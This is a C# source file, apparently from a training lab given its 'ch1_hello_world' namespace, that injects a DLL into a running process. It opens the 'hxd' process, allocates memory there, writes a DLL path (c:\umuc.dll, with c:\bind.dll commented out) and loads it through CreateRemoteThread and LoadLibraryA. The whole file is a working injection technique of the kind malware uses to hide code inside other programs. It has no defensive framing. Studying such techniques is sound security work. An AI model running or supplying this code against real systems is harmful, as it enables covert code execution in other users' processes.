using System; using System.Diagnostics; using System.Runtime.ConstrainedExecution; using System.Runtime.InteropServices; using System.Security; using System.Text; namespace ch1_hello_world { public class BasicInject { [Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000, Decommit = 0x4000, Release = 0x8000, Reset = 0x80000, Physical = 0x400000, TopDown = 0x100000, WriteWatch = 0x200000, LargePages = 0x20000000 } [DllImport("kernel32.dll")] public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId); [DllImport("kernel32.dll", CharSet = CharSet.Auto)] public static extern IntPtr GetModuleHandle(string lpModuleName); [DllImport("kernel32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] static extern IntPtr GetProcAddress(IntPtr hModule, string procName); [DllImport("kernel32.dll", ExactSpelling = true, SetLastError = true)] static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport("kernel32.dll", SetLastError = true)] static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten); [DllImport("kernel32.dll")] static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); [DllImport("kernel32.dll", SetLastError=true, ExactSpelling=true)] static extern bool VirtualFreeEx(IntPtr hProcess, IntPtr lpAddress, int dwSize, AllocationType dwFreeType); [DllImport("kernel32.dll", SetLastError=true)] [ReliabilityContract(Consistency.WillNotCorruptState, Cer.Success)] [SuppressUnmanagedCodeSecurity] [return: MarshalAs(UnmanagedType.Bool)] static extern bool CloseHandle(IntPtr hObject); const int PROCESS_CREATE_THREAD = 0x0002; const int PROCESS_QUERY_INFORMATION = 0x0400; const int PROCESS_VM_OPERATION = 0x0008; const int PROCESS_VM_WRITE = 0x0020; const int PROCESS_VM_READ = 0x0010; const uint MEM_COMMIT = 0x00001000; const uint MEM_RESERVE = 0x00002000; const uint PAGE_READWRITE = 0x4; public static void Main(string[] args) { Process targetProcess = Process.GetProcessesByName("hxd")[0]; Console.WriteLine("hxd.exe PID: " + targetProcess.Id); // attach to process IntPtr hProcess = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id); Console.WriteLine("Process Handle: " + hProcess); // allocate memory in the process // string dllName = "c:\\bind.dll"; // string dllName = "c:\\hello-world-x86.dll"; string dllName = "c:\\umuc.dll"; IntPtr szRemoteFileName = VirtualAllocEx(hProcess, IntPtr.Zero, // (uint) ((dllName.Length) * Marshal.SizeOf(typeof(char))), MEM_COMMIT, PAGE_READWRITE); (uint) ((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), MEM_COMMIT, PAGE_READWRITE); Console.WriteLine("VirtualAllocEx: " + szRemoteFileName); // write path to dll in process UIntPtr bytesWritten; WriteProcessMemory(hProcess, szRemoteFileName, Encoding.Default.GetBytes(dllName), // (uint) ((dllName.Length) * Marshal.SizeOf(typeof(char))), out bytesWritten); (uint) ((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), out bytesWritten); Console.WriteLine("Bytes Written: " + bytesWritten); // get address of LoadLibraryA IntPtr pfnThreadRtn = GetProcAddress(GetModuleHandle("Kernel32.dll"), "LoadLibraryA"); Console.WriteLine("Kernel32 Address: " + pfnThreadRtn); // execute DLL IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, pfnThreadRtn, szRemoteFileName, 0, IntPtr.Zero); VirtualFreeEx(hProcess, szRemoteFileName, 0, AllocationType.Release); CloseHandle(hThread); CloseHandle(hProcess); return; } } }